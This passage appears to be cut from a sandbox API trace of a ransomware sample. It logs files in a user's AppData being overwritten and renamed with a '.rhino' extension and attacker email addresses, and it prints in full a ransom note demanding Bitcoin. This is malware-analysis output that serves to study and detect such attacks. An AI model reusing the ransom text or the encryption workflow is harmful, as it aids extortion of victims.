HALPmcxz\\AppData\\Roaming\\l_BCBt53g.gif.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\l_bcbt53g.gif.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0086.632] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7675c0 | out: hHeap=0x6d0000) returned 1 [0086.632] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x767438 | out: hHeap=0x6d0000) returned 1 [0086.632] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.632] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0086.632] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0086.632] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x72a920 [0086.632] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75ef78 [0086.632] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0086.632] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.632] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.633] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0086.635] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x1d6 [0086.635] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x2f6, nNumberOfBytesToLockHigh=0x0) returned 1 [0086.636] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.636] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0086.637] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.638] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x1d6, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x1d6, lpOverlapped=0x0) returned 1 [0086.638] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0086.638] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.638] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0086.638] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0086.638] GetLastError () returned 0x0 [0086.639] SetLastError (dwErrCode=0x0) [0086.639] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.639] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1d6) returned 0x75ef78 [0086.639] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.639] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x75f158 [0086.639] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x75f260 [0086.639] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f158 | out: hHeap=0x6d0000) returned 1 [0086.639] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.639] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0086.639] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0086.639] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.639] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0086.639] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.639] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0086.639] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.639] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0086.639] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0086.640] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0086.640] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.640] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0086.640] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0086.640] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0086.640] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0086.640] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0086.640] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0086.640] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0086.640] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0086.640] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0086.640] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.640] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x72a920 [0086.640] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0086.640] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x75f158 [0086.640] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0086.640] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x75f3e8 [0086.640] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f158 | out: hHeap=0x6d0000) returned 1 [0086.640] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x75f4c8 [0086.641] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f3e8 | out: hHeap=0x6d0000) returned 1 [0086.641] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x75f610 [0086.641] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f4c8 | out: hHeap=0x6d0000) returned 1 [0086.641] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f6) returned 0x75f7f8 [0086.641] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f610 | out: hHeap=0x6d0000) returned 1 [0086.641] WriteFile (in: hFile=0xec, lpBuffer=0x75f7f8*, nNumberOfBytesToWrite=0x2f6, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x75f7f8*, lpNumberOfBytesWritten=0x2cfa04*=0x2f6, lpOverlapped=0x0) returned 1 [0086.641] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f7f8 | out: hHeap=0x6d0000) returned 1 [0086.641] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x2f6, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0086.641] CloseHandle (hObject=0xec) returned 1 [0086.651] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x75f158 [0086.651] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x17e) returned 0x75f3e8 [0086.651] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f158 | out: hHeap=0x6d0000) returned 1 [0086.651] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0086.652] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f3e8 | out: hHeap=0x6d0000) returned 1 [0086.652] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f260 | out: hHeap=0x6d0000) returned 1 [0086.652] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.652] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0086.652] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0086.652] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f588 [0086.652] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x75ef78 [0086.652] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f588 | out: hHeap=0x6d0000) returned 1 [0086.652] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0086.653] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0086.653] WriteFile (in: hFile=0xec, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x2cfa5c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x2cfa5c*=0x2a4, lpOverlapped=0x0) returned 1 [0086.657] CloseHandle (hObject=0xec) returned 1 [0086.657] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0086.657] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0086.659] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x3fe4ab [0086.659] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x3fe5cb, nNumberOfBytesToLockHigh=0x0) returned 1 [0086.659] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.660] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0086.662] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.663] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x200000, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x200000, lpOverlapped=0x0) returned 1 [0086.775] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0086.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0086.775] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0086.775] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0086.775] GetLastError () returned 0x0 [0086.775] SetLastError (dwErrCode=0x0) [0086.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0086.775] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200023) returned 0x24b0020 [0086.984] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.985] WriteFile (in: hFile=0xec, lpBuffer=0x75f080*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x75f080*, lpNumberOfBytesWritten=0x2cfa04*=0x120, lpOverlapped=0x0) returned 1 [0086.985] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.985] WriteFile (in: hFile=0xec, lpBuffer=0x24b0040*, nNumberOfBytesToWrite=0x200000, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x24b0040*, lpNumberOfBytesWritten=0x2cfa04*=0x200000, lpOverlapped=0x0) returned 1 [0087.001] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x3fe5cb, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0087.001] CloseHandle (hObject=0xec) returned 1 [0087.621] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x75ef78 [0087.621] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x166) returned 0x75f208 [0087.621] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0087.621] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0087.622] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0087.622] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f080 | out: hHeap=0x6d0000) returned 1 [0087.622] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0020 | out: hHeap=0x6d0000) returned 1 [0087.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75ef78 [0087.664] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0087.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x75f040 [0087.664] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x75f108 [0087.664] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f040 | out: hHeap=0x6d0000) returned 1 [0087.664] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0087.665] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0087.665] WriteFile (in: hFile=0xec, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x2cfa5c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x2cfa5c*=0x2a4, lpOverlapped=0x0) returned 1 [0087.667] CloseHandle (hObject=0xec) returned 1 [0087.667] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f108 | out: hHeap=0x6d0000) returned 1 [0087.667] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\global.mpt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0087.668] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x5f600 [0087.668] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x5f720, nNumberOfBytesToLockHigh=0x0) returned 1 [0087.668] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.668] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0087.670] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.671] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x5f600, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x5f600, lpOverlapped=0x0) returned 1 [0087.678] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0087.678] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0087.678] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0087.678] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0087.678] GetLastError () returned 0x0 [0087.678] SetLastError (dwErrCode=0x0) [0087.679] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0087.679] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5f623) returned 0x23b0048 [0087.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0087.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x75f040 [0087.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x75f148 [0087.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f040 | out: hHeap=0x6d0000) returned 1 [0087.759] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0087.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0087.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0087.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0087.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0087.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0087.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0087.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0087.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0087.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0087.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0087.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0087.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0087.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0087.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0087.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0087.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0087.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0087.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0087.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0087.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0087.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0087.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0087.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0087.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0087.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x75f040 [0087.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0087.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x75f2d0 [0087.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f040 | out: hHeap=0x6d0000) returned 1 [0087.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x75f418 [0087.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f2d0 | out: hHeap=0x6d0000) returned 1 [0087.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x75f600 [0087.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f418 | out: hHeap=0x6d0000) returned 1 [0087.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75f8d0 [0087.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f600 | out: hHeap=0x6d0000) returned 1 [0087.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x75fd08 [0087.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f8d0 | out: hHeap=0x6d0000) returned 1 [0087.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x75f2d0 [0087.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fd08 | out: hHeap=0x6d0000) returned 1 [0087.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x75fc38 [0087.763] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f2d0 | out: hHeap=0x6d0000) returned 1 [0087.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x760a50 [0087.763] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fc38 | out: hHeap=0x6d0000) returned 1 [0087.763] RtlAllocateHeap 